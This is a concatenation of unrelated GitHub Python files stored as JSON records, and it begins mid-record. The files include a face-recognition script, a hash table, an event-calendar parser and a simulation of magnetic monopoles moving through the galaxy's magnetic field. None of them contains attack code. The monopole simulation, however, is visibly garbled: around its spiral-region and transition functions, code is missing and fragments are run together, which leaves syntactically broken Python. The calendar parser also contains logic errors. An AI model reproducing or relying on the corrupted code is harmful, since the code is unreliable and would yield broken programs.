labels)\n#print(g)\nnew_labels = graph.merge_hierarchical(labels, g, thresh=35, rag_copy=False, in_place_merge=True,\n                                   merge_func=merge_mean_color, weight_func=weight_mean_color)\nprint(new_labels)\nimg_out = color.label2rgb(new_labels, img, kind='avg')\nimg_out = segmentation.mark_boundaries(img_out, new_labels, (0,0,0))\nio.imshow(img)\nio.show()\nio.imshow(img_out)\nio.show()\n\nfor (i, segVal) in enumerate(np.unique(new_labels)):\n    print(i, segVal)\n    mask = np.zeros(img_out.shape[:2], dtype=\"uint8\")\n    mask[new_labels == segVal] = 255\n    print(mask);break\n    '''cv2.imshow(\"Mask\", mask)\n    cv2.imshow(\"Applied\", cv2.bitwise_and(img_out, img_out, mask = mask))\n    cv2.waitKey(0)'''","repo_name":"shyamsuresh14/ImageSegmentationAndAnalysis","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"5364170238","text":"\ndef sum_2_nums(a,b):\n    if a == '' and b == '':\n        print(\"输入信息非法,请重新输入\")\n        exit()\n    else:\n        result = a+b\n        print(\"%d+%d=%d\"%(a,b,result))\n    \n\n\n\n\n\n\n\nnum1 = int(input(\"请输入第1个数字:\"))\nnum2 = int(input(\"请输入第2个数字:\"))\n'''if num2 != int:\n    print(\"输入信息非法,请重新输入\")'''\n\n\nsum_2_nums(num1,num2)\n","repo_name":"zhangsanjin3355/zxpython","sub_path":"32-带有参数的函数.py","file_name":"32-带有参数的函数.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42172691080","text":"import face_recognition as fr\nimport os\nimport cv2\nimport face_recognition\nimport numpy as np\nfrom time import sleep\n\n\ndef get_encoded_faces():\n\n    encoded = {}\n\n    for dirpath, dnames, fnames in os.walk(\"./face_repository\"):\n        for f 
in fnames:\n if f.endswith(\".jpg\") or f.endswith(\".png\"):\n face = fr.load_image_file(\"face_repository/\" + f)\n encoding = fr.face_encodings(face)[0]\n encoded[f.split(\".\")[0]] = encoding\n\n return encoded\n\n\ndef unknown_image_encoded(img):\n\n face = fr.load_image_file(\"face_repository/\" + img)\n encoding = fr.face_encodings(face)[0]\n\n return encoding\n\n\ndef classify_face(im):\n \n faces = get_encoded_faces()\n faces_encoded = list(faces.values())\n known_face_names = list(faces.keys())\n\n img = cv2.imread(im, 1)\n \n face_locations = face_recognition.face_locations(img)\n unknown_face_encodings = face_recognition.face_encodings(img, face_locations)\n\n face_names = []\n for face_encoding in unknown_face_encodings:\n \n matches = face_recognition.compare_faces(faces_encoded, face_encoding)\n name = \"Unknown\"\n\n \n face_distances = face_recognition.face_distance(faces_encoded, face_encoding)\n best_match_index = np.argmin(face_distances)\n if matches[best_match_index]:\n name = known_face_names[best_match_index]\n\n face_names.append(name)\n\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n \n cv2.rectangle(img, (left-20, top-10), (right+20, bottom+15), (300, 0, 0), 2)\n\n \n cv2.rectangle(img, (left-20, bottom -10), (right+20, bottom+15), (500, 0, 0), cv2.FILLED)\n font = cv2.FONT_HERSHEY_DUPLEX\n cv2.putText(img, name, (left -10, bottom + 10), font, 0.5, (300, 300, 300), 1)\n\n\n \n while True:\n\n cv2.imshow('Whom are you looking for?', img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n return face_names \n\n\nprint(classify_face(\"test1.jpg\")) # You can either try to find people \"test2.jpg\" or \"test1.jpg\" in the string.\n","repo_name":"serhanelmacioglu/Face-Recognition_Coding-with-Python","sub_path":"face.py","file_name":"face.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"34167904752","text":"class HashItem:\n def __init__(self, key, value): #we create a class for holding hash table items\n self.key = key\n self.value = value\nclass HashTable: #starting with a constructor, the hash table\n def __init__(self):\n self.size = 256\n self.slots= [None for i in range(self.size)]\n self.count = 0\n def _hash(self, key):\n mult=1\n hv = 0\n for ch in key:\n hv += mult * ord(ch)\n mult += 1\n return hv % self.size\n def put(self, key, value):\n item = HashItem(key, value)\n h = self._hash(key)\n while self.slots[h] is not None:\n if self.slots[h].key is key:\n break\n h = (h+1) % self.size\n if self.slots[h] is None:\n self.count +=1\n self.slots[h] = item\n def get(self, key):\n h= self._hash(key)\n while self.slots[h] is not None:\n if self.slots[h].key is key:\n return self.slots[h].value\n h = (h+1) % self.size\n return None\n \n def __setitem__(self, key, value):\n self.put(key, value)\n def __getitem__(self, key):\n return self.get(key)\n\n\n\n\n\n\nht = HashTable()\nht[\"goods\"] = \"eggs\"\nht[\"better\"] = \"ham\"\n\nfor key in (\"goods\" , \"better\"):\n v=ht.get(key)\n print(v)","repo_name":"vantage-ola/data_structures_algorithms","sub_path":"Python/Hashing/hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35512175856","text":"import re\r\nimport string\r\nfrom helper import *\r\n\r\n# title, location, month, day, starthour, endhour,startmin, endmin\r\ndef lineProcessor(lineList):\r\n 
eventsList = []\r\n lastLocation =-1\r\n content = []\r\n for i in range(0, len(lineList)):\r\n m = re.search(\"Location:.*\", lineList[i])\r\n \r\n if m and lastLocation ==-1:\r\n location = m.group(0).split(':')[1].strip()\r\n clock = lineList[i - 1].replace(\"Time:\", \"\").strip()\r\n title = lineList[i -3].strip()\r\n date = lineList[i - 2].replace(\"Date:\",\"\").strip()\r\n\r\n time1 = dateExtract(date)\r\n MM,DD = time1\r\n MM = TwoDigit(MM)\r\n DD = TwoDigit(DD)\r\n #print time1\r\n time2 = clockExtract(clock)\r\n start_HH, end_HH,start_MM, end_MM = time2\r\n start_HH = TwoDigit(start_HH)\r\n end_HH = TwoDigit(end_HH)\r\n start_MM = TwoDigit(start_MM)\r\n end_MM = TwoDigit(end_MM)\r\n #time = timeExtractSEASGEN(rawTime)\r\n\r\n lastLocation = i + 1\r\n \r\n \r\n elif m and lastLocation !=-1:\r\n \r\n \r\n content = lineList[lastLocation:i-4]\r\n lastLocation =i + 1\r\n\r\n #print title\r\n #print ('\\n')\r\n #print date\r\n #print ('\\n')\r\n #print clock\r\n #print ('\\n')\r\n #print location\r\n #print ('\\n')\r\n #print content\r\n #print ('\\n')\r\n \r\n #eventsList.append((title, date, clock, location, content))\r\n #eventsList.append((title, time1,time2, location, content))\r\n eventsList.append((title, location,MM,DD,start_HH, end_HH,start_MM, end_MM, content))\r\n\r\n location = m.group(0).split(':')[1].strip()\r\n clock = lineList[i - 1].replace(\"Time:\", \"\").strip()\r\n title = lineList[i -3].strip()\r\n date = lineList[i - 2].replace(\"Date:\",\"\").strip()\r\n time1 = dateExtract(date)\r\n MM,DD = time1\r\n MM = TwoDigit(MM)\r\n DD = TwoDigit(DD)\r\n \r\n #print time1\r\n time2 = clockExtract(clock)\r\n start_HH, end_HH,start_MM, end_MM = time2\r\n start_HH = TwoDigit(start_HH)\r\n end_HH = TwoDigit(end_HH)\r\n start_MM = TwoDigit(start_MM)\r\n end_MM = TwoDigit(end_MM)\r\n #print time2\r\n #lastLocation =i+3\r\n\r\n \r\n \r\n \r\n #time = timeExtract(rawTime)\r\n\r\n \r\n\r\n content = lineList[lastLocation:]\r\n \r\n \r\n #eventsList.append((title, time1, time2, location, content))\r\n eventsList.append((title, location,MM,DD,start_HH, end_HH,start_MM, end_MM, content))\r\n #print eventsList\r\n \r\n return eventsList\r\n \r\n \r\n\r\n## content = lineList[lastLocation:]\r\n## eventsList.append((title, time, locatison, content))\r\n \r\n \r\ndef dateExtract(date):\r\n if re.search(\"th\", date):\r\n day = date.split(',')[1].strip() \r\n MM = charToNum(day.split(' ')[0])\r\n MM = TwoDigit(MM)\r\n DD = day.split(' ')[1].replace(\"th\", \"\").strip()\r\n DD = TwoDigit(DD)\r\n return MM, DD \r\n MM = charToNum('January')\r\n DD = charToNum('January')\r\n MM = TwoDigit(MM)\r\n DD = TwoDigit(DD)\r\n return MM, DD \r\n\r\n\r\ndef clockExtract(clock):\r\n if re.search(\":*-*:\", clock): \r\n flag_start = 0\r\n flag_end = 0\r\n start_time = clock.split('-')[0] \r\n end_time = clock.split('-')[1] \r\n if start_time.find('pm'): \r\n start_time = start_time.replace('pm','') \r\n flag_start = 1\r\n else: \r\n start_time =start_time.replace('am','') \r\n \r\n if end_time.find('PM'): \r\n end_time =end_time.replace('pm','') \r\n flag_end = 1\r\n else: \r\n end_time =end_time.replace('am','') \r\n \r\n if(flag_start ==1): \r\n start_HH = TwlToTwen(start_time.split(':')[0]) \r\n \r\n start_MM = start_time.split(':')[1].strip() \r\n \r\n if(flag_end ==1): \r\n end_HH = TwlToTwen(end_time.split(':')[0]) \r\n end_MM = end_time.split(':')[1].strip()\r\n #if re.search(\"*am*\", start_MM):start_MM = start_MM.replace(\"am\", \"\").strip()\r\n if \"am\" in start_MM:\r\n start_MM = 
start_MM.replace(\"am\", \"\").strip()\r\n start_HH = str(int(start_HH) - 12) \r\n return start_HH, end_HH,start_MM, end_MM\r\n start_HH = '00'\r\n end_HH = '00'\r\n start_MM = '00'\r\n end_MM = '00'\r\n return start_HH, end_HH,start_MM, end_MM\r\n\r\n##def charToNum(x): \r\n## ''' Change month format from char to digit'''\r\n## #Strips leading/trailing white space form x \r\n## x= x.strip() \r\n## return { \r\n## 'January': 1, \r\n## 'February': 2, \r\n## 'March': 3, \r\n## 'April': 4, \r\n## 'May': 5, \r\n## 'June': 6, \r\n## 'July': 7, \r\n## 'August': 8, \r\n## 'September': 9, \r\n## 'October': 10, \r\n## 'Novermber': 11, \r\n## 'December': 12, \r\n## }.get(x, 0) \r\n \r\n\r\n##def TwlToTwen(x): \r\n## ''' Change time format from 12hour to 24 hour'''\r\n## #Strips leading/trailing white space form x \r\n## x=x.strip() \r\n## return{ \r\n## '1': 13, \r\n## '2': 14, \r\n## '3': 15, \r\n## '4': 16, \r\n## '5': 17, \r\n## '6': 18, \r\n## '7': 19, \r\n## '8': 20, \r\n## '9': 21, \r\n## '10': 22, \r\n## '11': 23, \r\n## }.get(x,12) \r\n\r\n\r\n\r\n#def main():\r\n #f = open(\"gse.txt\")\r\n #psg = f.readlines()\r\n #print lineProcessorSEASGEN(psg)\r\n #lineProcessorSEASGEN(psg)\r\n #for i in range(0, len(eventsList)):\r\n #print eventsList[i]\r\n \r\n \r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"nevsaynev/Penn-Assignment-2nd-Year","sub_path":"PennCalendar/data_seasGen_2.py","file_name":"data_seasGen_2.py","file_ext":"py","file_size_in_byte":5776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23892430244","text":"import sys\nfrom PyQt5 import QtWidgets\nfrom table import Table\nfrom solution import Solution\nfrom first_window import Ui_FirstWindow\nfrom second_window import Ui_SecondWindow\n\n\nt = Table()\ns = Solution(t)\napp = QtWidgets.QApplication(sys.argv)\nMainWindow = QtWidgets.QMainWindow()\nui = Ui_FirstWindow(t, s, lambda: open_second_window())\nui.setupUi(MainWindow)\nMainWindow.show()\n\n\ndef open_second_window():\n global SecondWindow\n SecondWindow = QtWidgets.QMainWindow()\n sw = Ui_SecondWindow(ui.t, ui.s)\n sw.setupUi(SecondWindow)\n MainWindow.close()\n SecondWindow.show()\n\n def return_to_first_window():\n SecondWindow.close()\n MainWindow.show()\n\n sw.push_button_back.clicked.connect(return_to_first_window)\n\n\nsys.exit(app.exec_())\n","repo_name":"BychkovArthur/minimal-DNF","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22125759228","text":"#Tracking Magnetic Monopoles Through the Galaxy:\n#input starting conditions into the program and it will track the magnetic monopole's path through the bfield.\n\n#Bfield given by \"A New Model of the Galatic Magnetic Field\" Jansson, Farrar (2012).\n#Mass bounds from \"Signatures for a Cosmic Flux of Magnetic Monopoles\" Wick (2002) are 40TeV <~ M <~ 10^8TeV.\n#Wick(2002) has more information on likely mass values.\n\n#units used are all SI units except: distance is in kpc, and angles are in degrees, magnetic field strength is in microgauss.\n\n#variable names generally match those in the Bfield paper.\n\nfrom __future__ import print_function, division\nimport math\nimport numpy as np\nimport sys\nimport random\nimport datetime\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n#=======CONSTANT PARAMETERS=======\nc=29979245800.0 #light speed in 
cm/s\nexitstatus=True #did it leave the 20kpc sphere by the end of the program?\nnameofscript=\"mpoles15_graphed\" #name of the output file\n\nkpctocm=3.08567758e21\ncmtokpc=3.2407793e-22\nmicroGtoG=1e-6\nGeVtog=1.78266184e-24\n\n#=======DEFAULT STARTING CONDITIONS=======\nq_b=3.29106e-8 #the magnetic charge of the particle in Ampere*kpc by dirac quantization cond.\nm=1e13*GeVtog #mass (g, enter in GeV). An estimate from Wick (2002).\ndt=1.0e19 #the timestep (smaller = more accuracy, more computing time) in seconds\ndistance_to_halt= 40.0*kpctocm #when to stop the program if it doesn't leave r>20kpc\n\npos_0=np.array([-8.5*kpctocm, 0.0, 0.0]) #starting position (cm), position of earth is x=-8.33937979kpc\n#vel_0=np.array([0.0, 0.0, -30000]) #starting velocity (cm/s)\nV=0.0\nTHETA=0.0 #theta is the polar angle\nPHI=0.0 #phi is the azimuthal angle\n\n\n\n#=======INPUTTED STARTING CONDITIONS=======\n#if sys.argv[1]!=\"N\":\n# q_b=float(sys.argv[1])\n#if sys.argv[2]!=\"N\":\n# m=float(sys.argv[2])\n#if sys.argv[3]!=\"N\":\n# posx=float(sys.argv[3])\n#if sys.argv[4]!=\"N\":\n# posy=float(sys.argv[4])\n#if sys.argv[5]!=\"N\":\n# posz=float(sys.argv[5])\n#if sys.argv[6]!=\"N\":\n# distance_to_halt=float(sys.argv[6])\n#if sys.argv[7]!=\"N\":\n# dt=float(sys.argv[7])\n#if sys.argv[8]!=\"N\":\n# V=float(sys.argv[8])\n#if sys.argv[9]!=\"N\":\n# THETA=float(sys.argv[9])\n#if sys.argv[10]!=\"N\":\n# PHI=float(sys.argv[10])\n\n#=======DISK PARAMETERS, WITH B IN Gauss. Converted to Tesla when field is calculated=======\nb1=0.1*microGtoG\nb2=3.0*microGtoG\nb3=-0.9*microGtoG\nb4=-0.8*microGtoG\nb5=-2.0*microGtoG\nb6=-4.2*microGtoG\nb7=0.0\nb8=2.7*microGtoG\nb_ring=0.1*microGtoG\nh_disk=0.4*kpctocm #h_disk and w_disk are lengths (kpc in the paper), not field strengths\nw_disk=0.27*kpctocm\n\n#=======HALO PARAMETERS & FUNCTIONS=======\nB_n=1.4*microGtoG\nB_s=-1.1*microGtoG\nr_n=9.22*kpctocm\nr_s=16.7*kpctocm #NOTE: parameter has a large error.\nw_h=0.2*kpctocm\nz_0=5.3*kpctocm\ni=np.radians(11.5) #this is the opening \"pitch\" angle of the logarithmic spiral boundaries.\nr_negx=np.array([5.1, 6.3, 7.1, 8.3, 9.8, 11.4, 12.7, 15.5])*kpctocm #these are the radii (kpc, converted to cm) at which the spirals cross the x-axis\n\ndef r_i(T,I): #halo spiral boundary function\n return r_negx[I]*np.e**((T-np.pi)*np.tan(i))\n \n#NOTE: the bodies of the region-membership helpers below were corrupted in this copy;\n#they are reconstructed in an assumed form consistent with how they are called later.\ndef subregioncheck(r,theta,i1,i2):\n if r>r_i(theta,i1) and r<r_i(theta,i2):\n return True\n if r>r_i(theta-2*np.pi,i1) and r<r_i(theta-2*np.pi,i2):\n return True\n return False\n\ndef regioncheck(r,theta,i1,i2): #True if (r,theta) lies between spiral boundaries i1 and i2 on any wrap\n if r>r_i(theta,i1) and r<r_i(theta,i2):\n return True\n if r>r_i(theta+2*np.pi,i1) and r<r_i(theta+2*np.pi,i2):\n return True\n if r>r_i(theta-2*np.pi,i1) and r<r_i(theta-2*np.pi,i2):\n return True\n return False\n\ndef regiondebug(r,theta): #reconstructed sketch: returns (number of disk regions containing the point, indices of the bounding spirals); used only by the region-map plot\n count=0\n bounds=[0,0]\n for n in range(8):\n if regioncheck(r,theta,(n+7)%8,n):\n count+=1\n bounds=[(n+7)%8,n]\n return count,bounds\n\ndef L(Z,H,W): #the transition function of Jansson & Farrar (2012)\n return (1.0+np.e**(-2.0*(abs(Z)-H)/W))**(-1.0)\n\n#=======X-FIELD PARAMETERS (best-fit values from Jansson & Farrar 2012)=======\nB_X=4.6*microGtoG\nTheta0_X=np.radians(49.0)\nrc_X=4.8*kpctocm\nr_X=2.9*kpctocm\n\ndef R_p(R,Z):\n if abs(Z) >= np.tan(Theta0_X)*(R-rc_X):\n return R*rc_X/(rc_X+abs(Z)/np.tan(Theta0_X))\n\n else:\n return R-abs(Z)/np.tan(Theta0_X)\n\ndef b_Xf(R_P):\n return B_X*np.e**(-R_P/r_X)\n\n#def Theta_X(R,Z):\n# if abs(Z)>=np.tan(Theta0_X)*np.sqrt(R)-np.tan(Theta0_X)*rc_X:\n# return np.arctan(abs(Z)/(R-r_p(R,Z))) #think about atan and maybe problems with quadrants\n# else:\n# return Theta0_X\n\n#striation parameters (the striated field is currently unused)\n#gamma= 2.92\n#alpha= 2.65 #taken from page 9, top right paragraph\n#beta= gamma/alpha-1\n\n#=======OTHER PRELIMINARY DEFINITIONS=======\n\ndef mag(V):\n return np.sqrt(V[0]**2+V[1]**2+V[2]**2)\n \ndef Theta(X,Y): #this theta goes from 0 to 2pi\n if X == 0.0:\n if Y > 0.0:\n return np.pi/2\n if Y < 0.0:\n return 3.0*np.pi/2\n else:\n return 0\n else:\n if Y < 0.0:\n return np.arctan2(Y,X)+2*np.pi\n else:\n return np.arctan2(Y,X)\n \n \ndef Gam(V):\n return (1.0-(mag(V)/c)**2)**(-0.5)\n \n #check the KE\ndef KE(VEL):\n if Gam(VEL) != 1:\n return m*c**2*(Gam(VEL)-1) #KE, ergs\n else:\n return 0.5*m*mag(VEL)**2\n \n \n\ndef gettimestd():\n output=\"\"\n 
W=str(datetime.datetime.now())\n for n in [2,3,5,6,8,9]:\n output+=W[n]\n output+=\"_\"\n for n in range(11,13):\n output+=W[n]\n output+=\".\"\n for n in range(14,16):\n output+=W[n]\n output+=\".\"\n for n in range(17,23):\n output+=W[n]\n return output\n \ndef gettimesecs():\n W=str(datetime.datetime.now())\n tsecs=0.0\n tsecs+=float(W[0]+W[1]+W[2]+W[3])*31556926\n tsecs+=float(W[5]+W[6])*2629743.83\n tsecs+=float(W[8]+W[9])*86400\n tsecs+=float(W[11]+W[12])*3600\n tsecs+=float(W[14]+W[15])*60\n tsecs+=float(W[17]+W[18])*1\n tsecs+=float(\"0.\"+W[20]+W[21]+W[22]+W[23]+W[24])\n return tsecs\n \ndef get_B(pos):\n r=np.sqrt(pos[0]**2.0+pos[1]**2.0)\n theta=Theta(pos[0],pos[1])\n r_p=R_p(r,pos[2])\n b_X=b_Xf(r_p)\n bfield=np.array([0.0, 0.0, 0.0]) #0 for r>1, <20\n \n if mag(pos) > 1.0*kpctocm and r<20*kpctocm and r!=0:\n phi_hat=np.array([-pos[1]/r, pos[0]/r, 0.0])\n \n# #halo:\n if pos[2] >= 0.0:\n bfield = np.e**(-abs(pos[2])/z_0)*L(pos[2],h_disk,w_disk)* B_n*(1-L(r,r_n,w_h)) * phi_hat\n\n else:\n bfield = np.e**(-abs(pos[2])/z_0)*L(pos[2],h_disk,w_disk)* B_s*(1-L(r,r_s,w_h)) * phi_hat\n \n \n# #X-field: \n if pos[2] != 0: \n \n bhat_X=(pos[2]**2+(r-r_p)**2)**(-0.5)*np.array([pos[0]*(r-r_p)/r, pos[1]*(r-r_p)/r, pos[2]])\n if pos[2]<0:\n bhat_X*=-1\n \n if abs(r_p) < rc_X:\n bfield += b_X*(r_p/r)**2*bhat_X\n\n if abs(r_p) >= rc_X:\n bfield += b_X*(r_p/r)*bhat_X\n else:\n bfield +=b_X*np.array([0,0,1])\n \n #disk:\n if r>= 3.0*kpctocm and r < 5.0*kpctocm :\n bfield+=b_ring*(1-L(pos[2],h_disk,w_disk))*phi_hat\n \n if r>=5.0*kpctocm:\n if regioncheck(r,theta,7,0): #region 1\n bfield+=(b1/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,0,1): #region 2\n bfield+=(b2/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,1,2): #region 3\n bfield+=(b3/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,2,3): #region 4\n bfield+=(b4/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,3,4): #region 5\n bfield+=(b5/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,4,5): #region 6\n bfield+=(b6/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,5,6): #region 7\n bfield+=(b7/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif regioncheck(r,theta,6,7): #region 8\n bfield+=(b8/r)*(1.0-L(pos[2],h_disk,w_disk))*np.array([np.sin(theta+i),-np.cos(theta+i),0.0])\n \n elif pos[2]==2:\n print(\"=====NO REGION FOUND! BUG IN PROGRAM!!!=====\")\n print(\"pos:\",pos, end=\"\\n \\n \")\n global posbug_list\n try:\n posbug_list+=[[x for x in pos]]\n except NameError:\n posbug_list=[[x for x in pos]]\n \n \n return bfield\n\n#FIND THE MAXIMUM B MAGNITUDE ON An XY CROSS SECTION (debug)\n#maxB=0.0\n#for xxx in np.linspace(-20*kpctocm,20*kpctocm,num=200):\n# for yyy in np.linspace(-20*kpctocm,20*kpctocm,num=200):\n# if mag(get_B([xxx,yyy,.01]))>maxB:\n# maxB=mag(get_B([xxx,yyy,.01]))\n#print(\"MAXB IS\",maxB)\n\ndef acc_relativistic(pos,vel): #returns relativistic acceleration. 
only necessary for large velocity.\n bfield=get_B(pos)\n gam=Gam(vel)\n force = q_b*bfield #In dynes\n acc=(gam*m*c**2)**(-0.5)*(c**2*force - np.dot(force,vel)*vel)\n return acc\n \ndef acc_classical(pos):\n bfield=get_B(pos)\n acc = bfield*(q_b/m)\n return acc\n \n#idea: make a relativistic and nonrel paradigm. when the speed is nonrel (difference\n#would be less than machine precision) relativistic=False. Every X iterations, check if \n#the paradigm should be changed, where X is the least number of iterations it would take\n#to change the velocity by, say, 1% of the speed of light.\n\n\ntzero=gettimesecs()\n\ng=open(nameofscript+\"_full_output\"+str(gettimestd())+\".txt\",\"a\")\n\n#=======PROGRAM BEGINS=======\n\n#for V in [30000]:\n# for THETA in [-np.pi/2, 0, np.pi/2]:\n# for PHI in [0, np.pi/2, np.pi, 3*np.pi/2]:\ntstartsecs=gettimesecs()\ntstartstd=gettimestd()\n\nprint(\"=======started at\",tstartstd,\"with V,THETA,PHI as\",V,THETA,PHI,\"=======\\n\")\n\na=nameofscript+gettimestd()+\".txt\"\nf = open(a, 'a')\n\n\nvel_0=V*np.array([np.sin(THETA)*np.cos(PHI), np.sin(THETA)*np.sin(PHI), np.cos(THETA)])\n\npos=np.array([0.0, 0.0, 0.0])\nvel=np.array([0.0, 0.0, 0.0])\n\nfor n in [0,1,2]:\n pos[n], vel[n]=pos_0[n], vel_0[n]\n\nf.write(\"\\n=====STARTING CONDITIONS FOR RUN \"+str(V)+str(THETA)+str(PHI)+\" ===== vel_0:\\n\")\nf.write(np.array_str(vel_0)+\"\\n\")\nf.write(\"mag(vel_0):\\n\")\nf.write(str(mag(vel_0))+\"\\n\")\nf.write(\"mag(vel_0)/c\\n\")\nf.write(str(mag(vel_0)/c)+\"\\n\")\nf.write(\"THETA_0\\n\")\nf.write(str(THETA)+\"\\n\")\nf.write(\"PHI_0\\n\")\nf.write(str(PHI)+\"\\n\")\nf.write(\"q_b\\n\")\nf.write(str(q_b)+\"\\n\")\nf.write(\"m\\n\")\nf.write(str(m)+\"\\n\")\nf.write(\"dt\\n\")\nf.write(str(dt)+\"\\n\")\nf.write(\"distance to halt\\n\")\nf.write(str(distance_to_halt)+\"\\n\")\n\nmaxvelocity=mag(vel)\ndistance_tracked=0.0 #set the distance travelled so far to 0\ntime=0.0\niterations=0\narclength_in_rho1kpc_region=0.0\n\n#FOR GRAPHING:\nxlist, ylist, zlist=[np.array([]) for _ in range(3)]\n\nwhile mag(pos) < 20.0*kpctocm and distance_tracked < distance_to_halt:\n iterations+=1\n print(\"vel:\",vel)\n print(\"magvel:\",mag(vel))\n print(\"magvel/c:\",mag(vel)/c)\n \n acc=acc_relativistic(pos,vel)\n k1=np.array([-vel*dt, -acc_relativistic(pos, vel)*dt ])\n print(\"k1:\",k1)\n print(\"magvelnew:\",vel+k1[1]/2.0)\n print(\"magvelnew/c:\",(vel+k1[1]/2.0)/c)\n k2=np.array([-(vel+k1[1]/2.0)*dt, -acc_relativistic(pos+k1[0]/2.0, vel+k1[1]/2.0)*dt ])\n print(\"k1 ver 2:\",k1)\n k3=np.array([-(vel+k2[1]/2.0)*dt, -acc_relativistic(pos+k2[0]/2.0, vel+k2[1]/2.0)*dt ])\n k4=np.array([-(vel+k3[1])*dt, -acc_relativistic(pos+k3[0], vel+k3[1])*dt ])\n \n pos_step=(k1[0] + 2*k2[0] + 2*k3[0] + k4[0])/6.0\n \n #tested: mutability of np array does not mess this up (changing vel, pos does not chg k1)\n vel+=(k1[1] + 2*k2[1] + 2*k3[1] + k4[1])/6.0\n \n pos+=pos_step\n distance_tracked += mag(pos_step)\n \n #FOR GRAPHING:\n xlist=np.concatenate((xlist,np.array([pos[0]])))\n ylist=np.concatenate((ylist,np.array([pos[1]])))\n zlist=np.concatenate((zlist,np.array([pos[2]])))\n \n \n \n #here, we adjust the timestep so that: \n #1. the velocity changes by .001% every iteration (hence the 0.00001)\n #2. the change in distance is never greater than 0.01kpc in one iteration (hence the 0.01). 
equation comes from v^2=v_0^2 + 2a(dx)\n# dt=min([1e50, abs((1/mag(acc))*(mag(vel)+np.sqrt(mag(vel)**2+2*mag(acc)*0.01))) ]) #.000001*mag(vel)/mag(acc)\n# print(\"dt is\",dt)\n# print(\"dt choices were:\",.000001*mag(vel)/mag(acc), abs((1/mag(acc))*(mag(vel)+np.sqrt(mag(vel)**2+2*mag(acc)*0.01))))\n# print()\n# print(\"pos mag is \",mag(pos))\n# print(\"vel mag/c is\",mag(vel)/c)\n# print(\"acc mag/c is\",mag(acc)/c)\n# print()\n \n #EULER METHOD\n# pos += -vel*dt - 0.5*acc*dt**2\n# \n# vel += -acc*dt #this is the time-forwards velocity\n \n if mag(vel)>c:\n g=open(\"SPEED ERROR \"+a,\"a\")\n g.write(\"beta was \"+str(mag(vel)/c))\n print(\"SPEED ERROR. beta was \"+str(mag(vel)/c))\n raise SystemExit()\n \n if iterations%20000==1:\n print(\"============done with iteration no.\",iterations,\"============\")\n print(\"pos: \", pos,\"\\n\")\n \n print(\"vel/c: \",vel/c)\n print(\"|vel/c|: \",mag(vel)/c,\"\\n\")\n \n print(\"acc: \", acc)\n print(\"|acc|: \",mag(acc),\"\\n\")\n \n print(\"bfield: \",get_B(pos))\n print(\"|bfield|: \",mag(get_B(pos)))\n print()\n print(\"displacement: \", mag(pos-pos_0),\"cm\")\n print(\"arc length traversed: \",distance_tracked,\"cm\")\n print(\"simulated time: \",-iterations*dt,\"seconds.\")\n print()\n print(\"runtime so far: \",gettimesecs()-tstartsecs,\"real seconds\")\n print(\"\\n \\n\")\n \n if mag(pos)<1.0*kpctocm:\n arclength_in_rho1kpc_region+=mag(pos_step)\n \ndistance_from_start=np.sqrt( (pos[0]-pos_0[0])**2 +(pos[1]-pos_0[1])**2 +(pos[2]-pos_0[2])**2)\ntheta_f=np.arccos(pos[2]/mag(pos))\nphi_f = Theta(pos[0],pos[1])\n\nif mag(pos)<20*kpctocm:\n exitstatus=False\n\nf.write(\"===FINAL CONDITIONS=== vel:\\n\")\nf.write(np.array_str(vel)+\"\\n\")\nf.write(\"mag(vel)\\n\")\nf.write(str(mag(vel))+\"\\n\")\nf.write(\"mag(vel)/c\\n\")\nf.write(str(mag(vel)/c)+\"\\n\")\nf.write(\"pos\\n\")\nf.write(np.array_str(pos)+\"\\n\")\nf.write(\"mag(pos)\\n\")\nf.write(str(mag(pos))+\"\\n\")\nf.write(\"theta_f\\n\")\nf.write(str(theta_f)+\"\\n\")\nf.write(\"phi_f\\n\")\nf.write(str(phi_f)+\"\\n\")\nf.write(\"distance tracked\\n\")\nf.write(str(distance_tracked)+\"\\n\")\nf.write(\"distance from start\\n\")\nf.write(str(distance_from_start)+\"\\n\")\nf.write(\"Kinetic Energy 